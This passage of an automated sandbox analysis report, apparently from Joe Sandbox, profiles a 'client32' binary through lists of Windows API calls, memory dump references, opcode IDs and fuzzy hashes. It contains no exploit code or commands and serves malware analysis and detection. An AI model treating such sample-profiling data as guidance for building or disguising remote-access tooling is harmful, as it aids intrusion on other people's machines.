                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 4241058051-934300333
                                                                                                                                                                                                    • Opcode ID: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
                                                                                                                                                                                                    • Instruction ID: d79372c4e35f96c7b6d882990e3a1748ca0edf213b09d886e21f34e7a2ab119d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F0E93AF4052777C21352663C49F8FF6684B81BA8F154071F911B5645EE14640051E6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110ED563
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                    • Opcode ID: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
                                                                                                                                                                                                    • Instruction ID: 402bb12deb77936e5eeacb062a8de3ed675085140f67c3334ce786458653fa44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3141A772E012199FD710CFA9D885BAEF7F8EF84719F10856AE916DB240DB35E500CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 110ED19C
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 110ED1DC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3489003387-0
                                                                                                                                                                                                    • Opcode ID: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                                                                                    • Instruction ID: db3aae85cbeca24dbd9e457748b34ba45ed53121808abb5c6b0ad0e7882c1e57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9218332A0111AAFD701DFA9C889BFEF7BCEB45219F1040ABFB05D6140DB34990187A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1113F2CB
                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000000), ref: 1113F2E8
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 1113F309
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000001), ref: 1113F312
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 1113F31C
                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000001,00000400), ref: 1113F332
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000001), ref: 1113F33A
                                                                                                                                                                                                    • DeleteMenu.USER32(?,-00000001,00000400), ref: 1113F351
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$Item$Delete$Count
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1985338998-0
                                                                                                                                                                                                    • Opcode ID: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
                                                                                                                                                                                                    • Instruction ID: 90b1ebb2a37eac89ef99d909188e48f60dab5b42f4deb930a222ec681177ebb5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F117C7680421ABBE702DB618CC8AAEFB7CEFC566AF108029F695D2144E7749541CB63
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6AE7
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6AF4
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B01
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B0E
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B1B
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B37
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 689D6B47
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B5D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecrementInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3448037634-0
                                                                                                                                                                                                    • Opcode ID: c7f44c9baa5f47b419578923e97442b5be550ac5ac7343711044cfd9955689bc
                                                                                                                                                                                                    • Instruction ID: 6947b0e03bc9f642a3029c735b103e1469a829ba51db76a1d2553c6d900715e1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7f44c9baa5f47b419578923e97442b5be550ac5ac7343711044cfd9955689bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F111271B04B15A7EB019F69DC84F56BBECAF84748F44842AAA28D7140DB78E410CBE4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(689D6EC0), ref: 689D6A50
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(106A0875), ref: 689D6A5D
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(C68B59FF), ref: 689D6A6A
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(FFEEDAE8), ref: 689D6A77
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(9F730068), ref: 689D6A84
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(9F730068), ref: 689D6AA0
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(F08B0000), ref: 689D6AB0
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(24468A4C), ref: 689D6AC6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: IncrementInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3508698243-0
                                                                                                                                                                                                    • Opcode ID: 241a84372edf6279f932eeecb31f2fa9ed240fa1da996134e166f90f8ac3fe49
                                                                                                                                                                                                    • Instruction ID: 9890f2faead27054ec395f9ebd1d285a82ff12c763b6892b64b711d7eda48f38
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 241a84372edf6279f932eeecb31f2fa9ed240fa1da996134e166f90f8ac3fe49
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8111B71B00A15ABEF01DF79CC84B5BBBECAF40288F84C416AA68D7140DB74E850CBE4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnumWindows.USER32(111276D0,?), ref: 111277D8
                                                                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11127829
                                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00000104), ref: 11127869
                                                                                                                                                                                                    • SendMessageTimeoutA.USER32(?,00000000,00000000,00000000,00000002,000001F4,?), ref: 11127914
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 11127A0B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateDeleteEnumMessageSendTextTimeoutWindowWindows
                                                                                                                                                                                                    • String ID: DISPLAY
                                                                                                                                                                                                    • API String ID: 2003738596-865373369
                                                                                                                                                                                                    • Opcode ID: cbe101280a819a206175a0f053a5ffed6f628a3f435ccc8d3fb3e29b669eb9f2
                                                                                                                                                                                                    • Instruction ID: daf97ec175890095a15a187f0d211b8f7d4f5fc3452f74960e728b40ba9e4cf9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbe101280a819a206175a0f053a5ffed6f628a3f435ccc8d3fb3e29b669eb9f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE8141B5E006299BDB25CF55CD85BEAF7B8EB48314F5085D5E909A7240EB30AE80CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?), ref: 689D98D1
                                                                                                                                                                                                      • Part of subcall function 689DD3F5: Sleep.KERNEL32(00000000,689D6F16,00000001,00000214), ref: 689DD41D
                                                                                                                                                                                                    • GetFileType.KERNEL32(?,?,?), ref: 689D9A04
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileInfoSleepStartupType
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1527402494-0
                                                                                                                                                                                                    • Opcode ID: d0820eb8bf7c7264c41046e89e737961076434d60bdede8d882aff718b795c05
                                                                                                                                                                                                    • Instruction ID: d642ca12bb353b8dfd99deda5ba47e8039b3bfd4436b6ea899d67684f9b48db6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0820eb8bf7c7264c41046e89e737961076434d60bdede8d882aff718b795c05
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71611472A08B058FDB00AF68C998B1D77E8AF06328F94C768D47ADB2D1E730D405CB09
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wvsprintfA.USER32(00000000,00000000,?), ref: 110791F0
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$idata->pButtonInfo$m_hWnd
                                                                                                                                                                                                    • API String ID: 175691280-4014050597
                                                                                                                                                                                                    • Opcode ID: 6a0f2256c8e02b13d78dae9a1ccdd340c274669d0a1b7722d79473c5eb4af10c
                                                                                                                                                                                                    • Instruction ID: 42ac0ee3d61232f6aa12f5cac541072e802a355f30b727a0d9f027468eebd1c8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a0f2256c8e02b13d78dae9a1ccdd340c274669d0a1b7722d79473c5eb4af10c
